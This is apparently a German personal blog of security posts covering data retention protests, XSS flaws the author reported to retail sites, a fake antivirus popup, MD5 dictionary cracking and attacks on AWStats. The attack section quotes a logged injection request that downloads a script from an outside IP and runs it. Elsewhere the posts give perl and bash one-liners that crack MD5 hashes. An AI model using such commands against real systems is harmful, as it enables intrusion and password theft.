Security

3 Tage ist das Jahr 1984 2009 nun alt, das heisst das bereits 3 Tage lang die Daten von allen Internetverbindungen, eMails und VOIP-Gesprächen gespeichert und den Behörden zugänglich gemacht werden müssen. In welcher Form die Daten aber gespeichert werden soll, ist bisher unklar. Die großen Provider haben aber allesamt die entsprechenden Vorkehrungen getroffen und speichern fortan für 6 Monate, was das Zeug hält. Dass es hier um Milliarden von Verbindungsdaten uns somit TeraByte's an Daten geht, kann man sich sicher vorstellen - und zwar jeden Tag!

Ein kleiner Lichtblick ist hier ganz klar der Hoster manitu.net, der sich auf seiner Seite klar gegen die Speicherung ausspricht (siehe Bild rechts). Es wäre wünschenswert, wenn andere Provider und Hoster folgen würden, vor Allem aus den Reihen der "Großen". Das Berliner Landgericht hatte ja BT Deutschland (British Telecom) im Oktober zugestanden, die Vorratsdatenspeicherung aussetzen zu dürfen. Warum sollte das dann nicht auch für andere Carrier, Provider, Hoster etc. gelten?

Gespannt darf man auch darauf sein, was aus unserer Sammelklage (mit "uns" meine ich hier 34.000 Bundesbürger, die motiviert durch den Arbeitskreis Vorratsdatenspeicherung Klage beim Verfassungsgericht eingereicht haben). Die endgültige Entscheidung des Gerichtes steht ja noch aus, man wartet wohl auf die Entscheidung auf europäischer Ebene - Irland hatte ja glücklicherweise gegen dieses Vorhaben ebenfalls geklagt.

Das weitere Highlight dieses Jahres ist zweifellos der "Bundestrojaner". So ist es seit 1.1. nicht auszuschließen, dass der eigene Rechner von den Behörden infiltriert wird. Allerdings wird das natürlich nur bei erhöhtem Terrorverdacht, Landesverrat oder nach dem Download von MP3's via BitTorrent eingesetzt. BKA-Präsident Ziercke geht von maximal 3-4 Installationen in diesem Jahr aus. Man kann also gespannt sein. Besonders erheiternd ist die Tatsache, dass nach den neuesten Einschränkungen des Bundesverfassungsgerichtes die Wohnung des zu bespitzelndes Opfers nicht betreten werden darf, um z.B. Software zu installieren oder Keylogger anzubringen. Es wird dann wohl auf Installationsversuche via eMails oder präparieren Websites hinauslaufen. Die Chancen dafür stehen aber recht schlecht, zumindest wenn nicht Software- und Security-Firmen eingeweiht sind. Ich freue mich zumindest auf die ersten Berichte von disassemblierten Bundestrojanern, die dann im Quelltext für Jedermann zur Verfügung stehen ...

In diesem Sinne ein gesundes Jahr 1984, und jede Menge Datensicherheit!

Ein Bekannter von mir hatte unlängst auf seinem Windows-PC einen Virus- bzw. Trojaner, der dort eine Weile sein Unwesen trieb. Um welchen Störenfried es sich dabei genau gehandelt hat, weiss ich leider nicht. Nachdem der Schadcode von seinem Rechner entfernt war, fiel ihm allerdings auf, dass sich auf seiner Website etwas verändert hat. Und zwar wurde dort schädliches JavaScript eingefügt. Zur Betrachtung im Textformat habe ich das Ganze hier hochgeladen.

Meine Analyse ergab allerdings nicht wirklich ein brauchbares Ergebnis - auf jeden Fall wird irgendwelches wirr kodiertes JS aus dem initialen String etwas verändert und anschließend via eval() ausgeführt. Was der Code aber genau macht, habe ich leider nicht herausfinden können. Vielleicht hat das ein Leser hier eine zündende Idee?

Ebenso unklar bleibt, wie der Code denn nun in das Index-Dokument seiner Website kam, die bei einem beliebigen ISP gelagert ist. Sollte der Trojaner tatsächlich das FTP-Programm, Dreamweaver oder gar Eclipse bemüht haben, um den Code auf die Seite hochzuladen? Es kann natürlich auch sein, dass der lokale Virus und das mutmaßlich schädliche JS auf dem Server des Providers in keinem Zusammenhang stehen. Im schlimmsten Fall ist gar der komplette Server beim ISP kompromittiert. Auf dem Webserver des Providers scheint aber wenigstens Linux mit Apache und PHP 4.4.9 zu laufen - das ergibt sich zumindest aus den Header-Informationen des Webservers.

Vor 2-3 Tagen bin ich bei Streifzügen in der "dunklen Seite des Internets", sprich Sex- und Warezseiten, auf ein lustiges Fundstück gestoßen. Aber erstmal noch kurz zur Rechtfertigung: Ich war auf dieser Art von Seiten tatsächlich nur unterwegs, um für mein Antispam-Projekt neue Spamversender zu "gewinnen" - ohne Mist

Plötzlich schob sich ein besonders tolles Popup auf meinen Bildschirm, in welchem offenbar ein Online-Malwarescanner sofort anfing, meine Festplatte C: nach Viren und Malware zu durchsuchen. Dumm nur, dass ich gar kein C: im Angebot hatte, schließlich spielte sich der Spaß auf meinem Linux-Laptop ab.

Ich ließ den "Scan" (offensichtlich ein GIF) also mal durchlaufen, das dauerte auch zum Glück nicht lange. Und dann der Schreck: 61 Fehler wurden gefunden. Die imaginäre Festplatte C: schien ebenso wie "Lokale Einstellungen" infiziert zu sein - was auch immer "Lokale Einstellungen" sind. Glücklichweise wurden die Bösewichte auch gleich aufgelistet, so gab es wohl allein 69 mit "Trojan.Mytob.Mailer" infizierte Objekte. Jedem Menschen mit minimalen mathematischen Fähigkeiten fällt gleich auf: Bei 61 Fehlern insgesamt sind 69 infizierte Elemente mit "Trojan.Mytob.Mailer" irgendwie seltsam

Zum Glück konnte man dort "Antivirus 360" gleich als .exe-Datei herunterladen. Das hat mir freilich unter Linux nichts genützt. So werde ich wohl noch Tage mit der Suche nach den Viren, Trojanern und, vor Allem, nach der Festplatte C: verbringen ...

Achja, die Website mit diesem tollen Scanner (onlinemalwarescanner.com) scheint inzwischen down zu sein. Was dem ahnungslosen Internet-User dort tatsächlich untergejubelt werden sollte, lässt sich nur erahnen. Vermutlich aber genau die Sachen, vor denen ein echter Viren- und Malwarescanner normalerweise schützt.

Zur Weihnachtszeit stehen Technik-Artikel natürlich oft wieder ganz oben auf der Wunschliste. Bei meinen abendlichen Surfsessions landete ich gestern dann irgendwann auf mediamarkt.de und auch saturn.de. Als Gag versuchte ich mal dann einfach mal, ein Formular via XSS zu manipulieren. Und siehe da, es funktionierte

So lassen sich auf beiden Seiten (die ja irgendwie sowieso via METRO zusammenhängen) die Newsletter-Formulare für XSS missbrauchen. Bei saturn.de geht das besonders schön, da man wie in einem CMS die Seite komplett mit eigenen Inhalten füllen kann, während das Design erhalten bleibt (siehe Screenshot). Ich habe einfach mal meinen geliebtes "Stallowned" - Banner und ein Fake-Formular samt Fake-Text eingefügt. Wenn man jetzt ein wenig mehr Arbeit reinsteckt und ein entsprechendes Botnetz zum Spamversand bereitstehen hat, kann man sicher binnen weniger Stunden jede Menge Kreditkartennummern und Kontodaten mit Fake-Schnäppchen abfangen. Der Fantasie sind hier praktisch keine Grenzen gesetzt. Eine Vielzahl von Usern würde die Seite durchaus für vertrauenswürdig halten, steht doch in der Browserleiste seriöserweise http://www2.saturn.de/ ...

Auf mediamarkt.de integriert sich der eigene Inhalt zwar nicht so schön ins Design, die Schwachstelle könnte man aber trotzdem problemlos ausnutzen, um z.B. Bank- oder Kundendaten abzufangen. Zumal hier sogar der Aufruf via https:// möglich ist, wenn auch nicht mit dem korrekten Zertifikat dafür. Ältere Browser dies jedoch soweit ich weiss nicht immer.

Die Unternehmen tun also auch hier gut daran, die Fehler schnellstens zu beheben. Ich habe natürlich jeweils den Webmaster darüber informiert, eine Antwort steht bisher noch aus. Mal schauen ob hier mehr Kompetenz im Spiel ist, als damals bei der XSS-Lücke auf Tchibo.de

Ich kann nicht genau sagen, wann sie es getan haben, aber sie haben die von mir mehrfach angemahnte XSS-Lücke (siehe auch hier) im Tchobo-Intershop endlich geschlossen. Ein Lob erspar ich mir an dieser Stelle, denn die Dauer bis zum Fix war mehr als peinlich. Wahrscheinlich war es nichtmal Tchibo selbst, sondern ein Intershop-Update. Wir werden es nie erfahren ...

Wenn ich mal ein paar Minuten Zeit und Lust habe, suche ich für die geneigte Leserschaft weitere XSS-Fundstücke - versprochen!

Wie ich zu meiner Erheiterung eben auf Heise gelesen habe, leitet perl.com neuerdings auf ein dubioses Blog (grepblogs.net) weiter, wo mit Erotik-Inhalten geworden wird. Witzigerweise gehört diese Domain aber Tom Christiansen, einem bekannten Perl-Entwickler. Offenbar hat er versucht, sich ein zweites Standbein aufzubauen, wenns mit PERL mal nicht mehr so klappt Das PERL-Hauptquartier unter perl.org ist aber weiterhin problemlos erreichbar.

Dies ist auf jeden Fall mal wieder ein tolles Beispiel dafür, dass man fremde JavaScript nicht auf seiner Seite einbinden sollte. Schuld ist hier nämlich ein JavaScript-Include, das folgendermaßen aussieht:

<script src="http://grepblogs.net/adx.js" type="text/javascript" language="JavaScript">

Normalerweise liefert dieses Script wahrscheinlich nur ein Banner oder so etwas aus, in diesem Fall aber eben eine nette Weiterleitung

Besonders toll wäre dieses Szenario, wenn mal wer ein paar Server von Google-Analytics hackt. Dann könnte ein Angreifer quasi das halbe Internet manipulieren und auf eigene Server umleiten. Schließlich haben millionen von Webseiten das Google-Analytics-JavaScript bei sich eingebunden. Unter Anderem auch diverse von mir betriebene Projekte. Bei Google sollte der Sicherheitsstandard zwar entsprechend hoch sein, generell ist dies aber kein netter Gedanke. Zumal ja nichtmal Google schuld sein muss, schließlich würde DNS-Spoofing auch schon reichen, um google-analytics.com umzuleiten ...

Nachdem ich mich die Tage mit einer Nasennebenhöhlenentzündung rumgeplagt habe bzw. immernoch rumplage (daher meine geringer Aktivität hier) ist von Tchibo.de bereits die nächste kompetente Antwort auf die von mir entdeckte XSS-Lücke eingetroffen. Schockierenderweise sah die Antwort diesmal so aus:

Sehr geehrter Herr Klikics,
[ ... ]
Das Problem ist bekannt. Soweit uns bekannt ist, wird dies bei den wichtigen Seiten unterbunden.
Sie können uns gerne einen Tipp schicken, damit wir weiter Verbesserungen machen können.

Ist nicht wahr, oder? Entweder man unterbindet XSS konsequent oder man lässt es. Schließlich spielt es im Falle eines Missbrauchs doch keine Rolle, wo genau der User seine Kreditkartennummer an den Phisher übermittelt. Als "Tipp" habe ich diesmal geantwortet, dass man HTML-Tags prinzipiell aus Userangaben entfernen sollte, vor Allem wenn man die Userangaben nach dem Absenden eines Formulares noch einmal anzeigt. Mal schauen ob ich erneut eine so tolle Antwort erhalte.

Im Grunde hätte ich die Lücke (die natürlich immernoch besteht) vielleicht lieber aktiv nutzen sollen, anstatt mich mit dem Support rumzuschlagen. Für eine Senseo-Maschine z.B. für 29,99 EUR hätten doch sicher jede Menge Leute ihre Kreditkartennummer an mich übermittelt, oder?

Nachdem ich vor einigen Tagen eine XSS-Lücke auf tchibo.de entdeckt hatte, antwortete mir der sofort informierte Support heute leider sehr unzureichend auf die Info zur Schwachstelle in der eigenen Webseite. Offenbar vermutet der Mensch im Support, dass ich das sinnlose "Stallowned"-Bild mit in meine Empfehlungs-eMail packen will. Sehr interessant, diese Vermutung

Meine Erwähnungen von "XSS-Lücke" und "Sicherheitsproblemen" wurden großzügig übersehen und ignoriert, so dass ich leider Opfer dieser Standardantwort wurde:

Sehr geehrter Herr Klikics,
[ ... ]
Die Angaben der fett markierten Felder benötigen wir, um Ihre Empfehlung bearbeiten zu können.
Diese sind bei Ihnen nicht gefüllt.

Das "eingefügte" Bild kann nicht mitgesendet werden.
[...]

Aber natürlich lasse ich nicht locker und habe erneut mit der Bitte um Weiterleitung meiner Info's an die IT geantwortet. Mal schauen, was nun zurückkommt ...

Vorgestern las ich mit Interesse den Heise-Artikel zu einer XSS-Lücke auf bundesregierung.de, wo Marcell Dietl in Blog Links zu bundesregierung.de gepostet hatte, auf dem Ex-Rambo Sylvester Stallone mit einem coolen Hemd und dem Spruch "You got STALLOWN3D" zu sehen war (Link zum Bild). Das war nach dem Fake-Rücktritt von Angela Merkel bereits die 2. Lücke auf der Website der Bundesregierung. Nunja, dass unsere Regierung nicht nur offenkundige Fehler auf ihrer Website sondern in diversen Bereichen hat, ist ohnehin schon lange klar

Alternativ zu dieser Heise-Meldung hatte ich in einem weiteren Tab meines Firefox noch den Onlineshop eines großen Kaffee- und Schnäppchen/Allesanbieters, nämlich tchibo.de, offen. Eine Skijacke hatte es mir besonders angetan, so dass ich diese gleich einem Familienmitglied per Empfehlung senden wollte. Natürlich gibts diese Funktion beim eingesetzten Shopsystem Intershop auf tchibo.de zu jedem Produkt als Option. Und natürlich werden dort (leider) die Eingaben nicht ordentlich geprüft, so dass man mit diversen Tags die tollsten Sachen auf der Tchibo-Seite machen kann. Unter Anderem kann man das coole Stallowned-Bild dort einbinden (siehe Screenshot) und Texte hinterlegen (hier: XSS ist plöt!). Das sind wahrscheinlich noch die harmlosesten Varianten, mit I-Frames und externen Javascripts kann man noch viel mehr machen, vielleicht sogar unerfahrene User zur Eingabe ihrer Kreditkartennummern usw. bewegen, wenn man massenhaft Spams mit diesen manipulierten Links raushaut. Wie einfach das geht, und dass es dort in dem Formular keinerlei Sicherheitsabfragen gibt, zeigt dieser Direktlink (keine Ahnung, wie lange der funktionieren wird), der den Nutzer direkt zu der manipulierten Seite bringt - in diesem Fall nur wieder mit dem harmlosen Bild von "Sly"

Natürlich habe ich es nicht bis auf die Spitze getrieben, sondern lieber die Betreiber über den Missstand informiert ... die Kollegen dort sollten also dringend mal die Datei /home/cvs/cvsroot/tchibo_cvs/dev/share/private/eCS/Store/templates/de/tch_de_recommendation.isml bearbeiten - witzigerweise lässt sich der absolute Pfad zum File im CVS-Repository direkt als Kommentar aus dem Quelltext auslesen (was ja eigentlich nix macht hier an der Stelle). Da kann man auch sehen, dass die Datei zuletzt am 30.11.07 bearbeitet wurde.

Leider gibt es wahrscheinlich noch tausende von Webseiten, die derartige Lücken aufweisen und sich der Konsequenzen nicht bewusst sind. Spätestens aber wenn die eigene Seite einmal für Phishing oder Ähnliches missbraucht wurde und evtl. sogar deswegen in der Presse auftaucht, werden die kleinen Lücken zu richtigen Problemen. Dabei ist es doch eigentlich recht einfach, dies zu umgehen. Eine einfache Umwandlung oder Entfernung von HTML-Tags in Eingabefeldern behebt dieses Problem beispielsweise sehr effektiv.

Update:
Im Heiseforum war ein weiteres, sehr nettes Beispiel verlinkt: XSS auf cdu.de - nur mal als Beweis dafür, dass tausende Sites betroffen sind

Mit einem Schmunzeln las ich kürzlich den Blogeintrag "Google as a password cracker" bzw. den Artikel dazu auf heise.de. Da hat also Jemand zufällig einen MD5-Hash "reverse lookup'en" können, indem er ihn bei Google eingegeben hat. Er kam dann darauf, dass der Hash "20f1aeb7819d7858684c898d1e98c1bb" aus dem Wort "Anthony" entstand. Inzwischen oder evtl auch schon viel länger kann man das übrigens auch mit dem "reverse engineer" auf md5.rednoize.com herausbekommen - ebenso derzeit 48.424.776 weitere Hashes. Eine wirklich interessante Website

Einmal mehr sieht man daran, dass normales MD5-Hashing nicht (mehr) ausreicht, um Passwörter sicher zu speichern. Da sollte man wenigstens mit einem Salt oder besser gleich mit SHA1 arbeiten, um die Passwörter sicher in irgendwelchen Datenbanken etc. zu speichern. Für den Endanwender bleibt es natürlich dabei, ein möglichst komplexes Passwort zu verwenden. "Anthony" gehört übrigens definitiv nicht dazu.

Linux selbst eignet sich übrigens im Zusammenspiel mit PERL auch perfekt zum "Cracken" von MD5's, dabei kann man sich direkt das Dictionary mit seinen derzeit 98.569 gängien Worten (auf meinem Ubuntu-Laptop eben nachgezählt) unter /usr/share/dict/words zu nutze machen:

perl '-MDigest::MD5(md5_hex)' -ne 'chomp; print "$_\n" if md5_hex($_)
eq "20f1aeb7819d7858684c898d1e98c1bb"' /usr/share/dict/words

Obiges Kommando gibt, wie sollte es anders sein, "Anthony" zurück
Achja, und die Bash selbst kann das natürlich auch, wenn auch deutlich langsamer:

for i in `cat /usr/share/dict/words`; do echo -n $i | md5sum | grep 20f1aeb7819d7858684c898d1e98c1bb && echo -n $i; done

PS: Wer e7c76cef847afb15ad91d9fa29321509 "knackt", kann sich einen Keks nehmen

Es war saukalt (gefühlte 0 Grad oder sowas), deshalb war ich im ersten Moment überrascht, dass sich in Dresden dennoch um die 400 Leute versammelt hatten (Thema dazu im Heise-Forum). Insgesamt sind es laut Pressecenter bisher aber nur lausige 11.000 Teilnehmer gewesen, weshalb auch 400 für Dresden gemessen an den Einwohnern deutlich zu wenig sind. Für mich eine deprimierende Zahl, bedenkt man, worum es geht. Die Teilnehmer hier in Dresden waren fast alle unter 30 (ok, wir ja auch ), was mir auch ein wenig Sorgen bereitet. Es scheint also fast so, als ob nur die junge Geek-Fraktion sich für das Problem der Vorratsdatenspeicherung interessieren würde. Besonders die älteren Bürger unseres Landes müssten doch aber eigentlich viel besser wissen, wohin sowas führt.

Von der eigentlichen Demo haben wir nicht viel mitbekommen, da man in den hinteren Reihen kaum ein Wort verstanden hat. Das machte allerdings nur bedingt etwas, schließlich wissen wir ja, worum es ging Dafür wurde das Grundgesetz mehrfach vorgetragen, was ich eher weniger sinnvoll fand. Am besten kam mir noch die Rede von 2 Mitgliedern des CCC vor, auch wenn wir hier ebenfalls nur die Hälfte verstanden haben. In den Lokalnachrichten habe ich bisher nichts dazu finden können, wenigstens aber auf n24.de, golem.de und natürlich heise.de. Ein wenig mehr Berichterstattung in der Presse wäre allerdings wünschenswert.

Man kann davon ausgehen, dass die Geschichte Freitag beschlossen wird. Dann kommt es eben darauf an, ob die Sammelklage erfolg hat bzw. wie dann entschieden wird. Es bleibt also auf jeden Fall spannend und wir lassen uns nicht beirren

Anbei noch 2 Handyfotos von der Demo in Dresden:

 

Ich bin eigentlich nicht der typische "Contra-Typ", der prinzipiell erst einmal gegen eine jede Sache ist, nur aus Prinzip. Bei der Vorratsdatenspeicherung sieht es allerdings schon ein wenig anders aus. Schließlich betrifft das wirklich jeden User des Netzes bzw. sämtlicher Kommunikationseinrichtungen unserer Zeit. Schließlich habe ich, wie díe meisten anderen normalen Menschen auch, keine Lust, hier zum gläsernen Bürger zu werden, dessen Aktivitäten in fast jeder Hinsicht komplett nachvollziehbar werden. Wir kommen "1984" immer näher und das macht mir wirklich Angst.

Wenn wir also nichts tun, haben wir in wenigen Jahren tatsächlich jenen Überwachungsstaat, den wir nicht wollen. Ich denke da nur an den Bundestrojaner als weiteres Highlight von Stasi 2.0-Oberguru Schäuble. Vermutlich komme ich in 10 Jahren für diesen Blogeintrag hier nachträglich in den Knast, obwohl ich ihn in 2 Jahren aus Angst genau davor löschen werde. Der Vorratsdatenspeicherung zum Dank gibts dann aber natürlich zahllose Kopien davon in irgendwelchen Ministerien ... wer weiss das schon. Besonders toll ich auch die Tatsache, dass unsere gespeicherten Daten dann im "Datenschlussverkauf" an 52 weitere Staaten weitergegeben werden. Irgendwo verständlich, Kunstsammler tauschen ja auch gern mal untereinander ihre Sachen aus.

Ein Lichtblick ist allerdings die Sammelklage auf vorratsdatenspeicherung.de. Daher bitte ich alle Leser, die noch nicht mitgemacht haben, sich einzutragen und auch tatsächlich den Brief abzuschicken. Laut Heise könnte die Sammelklage sogar die größte in der Geschichte der BRD werden, was ich als Lichblick für unser Land bewerte. Wenigstens gibt es doch noch eine gewisse Anzahl von Leuten hier, die nicht blind den abartigen Ideen einer entgleisten Regierung folgen - Terrorwarnungen hin oder her. Es wird hoffentlich auch einmal die Zeit kommen, in der Terror nicht mehr als Entschuldigung für Rechtsverletzungen und Entmündigung der Bürger herhalten kann ...

In diesem Sinne ist es durchaus sinnvoll, auch als Demo-Muffel, am 06.11. mal den Hintern vor die Tür zu schwingen und ein Zeichen zu setzen. Ich werde das hier in Dresden tun und hoffe, einige Andere auch! Cu there

Da will man pflichtgerecht seinen Windows-PC mit Updates bedienen, doch dies scheint aktuell nicht möglich. Das tolle Updatedingens im IE 7 bricht mit dem Fehlercode "[Fehlernummer: 0x80072EFF]" einfach ab. In der Knowledge-Base von Microsoft lässt sich nichts Konkretes finden, ein Blick in die $SYSTEM_INSTALL_DIR$/WindowsUpdate.log brachte aber folgenden Eintrag ans Licht:

2007-09-21 11:42:07:671 2504 108 Misc WARNING: DownloadFileInternal failed for http://download.windowsupdate.com/v7/windowsupdate/a/selfupdate/WSUS3/x86/Other/wsus3setup.cab: error 0x80072eff
2007-09-21 11:42:07:671 2504 108 WUWeb FATAL: CheckIfClientUpdateNeeded failed: error 0x80072eff

Es sieht also so aus, als ob wir in Kürze von MS mit v7 des WindowsUpdate beschenkt werden - bisher war ja v6 aktuell. Nur leider hat MS wohl vergessen, die entsprechenden CAB-Files zum Download bereitzulegen Mir wäre sowieso lieber, dass ich das neu aufgesetzte System hier mit den dringend nötigen Updates versehen kann!

Ich will ja hier keine Schimpfwörter verwenden, aber diese Norton-Sachen sind doch wirklich irgendwie der letzte Schrott, oder? Das fängt damit an, dass z.B. "Internet Security" default den Referer im Browser deaktiviert, so dass viele User Probleme bei der Benutzung diverser Websites haben, die dies abfragen. Dass Norton Antivirus der langsamste Scanner weit und breit ist, tut da noch nicht einmal etwas zur Sache

Witzigerweise ist man nun mit Norton Internet Security nicht einmal mehr im IRC "sicher". Es gibt nämlich einen tollen Filter dort, der sofort die Verbindung zum Server trennt, sobald jemand in einem Channel "startkeylogger" oder "stopkeylogger" eingibt. Ist das nicht supernett von Norton? Schließlich könnte ja jemand einen Keylogger mit diesem Kommando starten, mh? Man kann sich sicher vorstellen, dass davon diverse User betroffen sind und nicht einmal wissen, was da los ist. Für die Wissenden ist das natürlich ein Riesenspaß, vor allem in größeren Channels. Das Blogentry des Entdeckers findet ihr hier! Auch Heise berichtete.

Bei dieser Gelegenheit möchte ich es nicht auslassen, noch einmal auf die weitgehende Sinnlosigkeit von Personal Firewalls unter Windows hinzuweisen. Mehr Infos zur Windows-Sicherheit findet ihr hier! Dort steht auch, warum Personal Firewalls meist sinnfrei sind. Aber das sagt natürlich meist nie einer den Norton-Usern ...

Das durch diverse Sicherheitslücken negativ aufgefallene AWStats scheint für diverse Hackversuche immernoch ein sehr beliebtes Einfalltor zu sein. AWStats ist ein grafisches Auswertungstool für Webserver-Logfiles, geschrieben in Perl. Ich selbst habe es ergänzend zu Webdruid/Webalizer im Einsatz.

So habe ich bei Stichproben in den Apachelogs von heute bereits diverse Einbruchsversuche bemerkt:

:~ # grep "wget" /usr/local/apache/logs/httpsd_24_01_2006.log
www.*.de 80.55.2.210 - - [24/Jan/2006:03:03:18 +0100] "GET awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget
%20194%2e102%2e194%2e115%2fscripz%3b
chmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
www.* 80.55.2.210 - - [24/Jan/2006:03:03:26 +0100] "GET
...

Die Quell-IP bleibt gleich (diesmal waren es wohl die bösen Polen), die getesteten Domains hingegen sind immer andere. Sehr merkwürdig das Ganze. Ebenfalls merkwürdig ist die Datei wpoison.words, die ich in /tmp gefunden habe. Keine Ahnung, ob das vielleicht eine Passwortliste oder sowas für Bruteforce sein soll? Mir sagen die Begriffe darin zumindest nichts, wohl aber der Dateiname. Zumindest ist mir dieser schön öfter negativ auf Serversystemen aufgefallen. Vielleicht weiss ja jemand Rat?

Mit einer gewissen Sorge schaue ich ebenfalls auf den neuen Mailwurm Nyxem (was soll das sein, ein "Nyxem"? ) bzw. auf die Mailqueue, die seit gestern auf rund 6000 Mails pro Knoten gestiegen ist. Das ist nicht weiter viel, aber viel wird da ja vielleicht noch kommen. Unsere Virenscanner bereiten sich aber bereits auf einen harten Kampf vor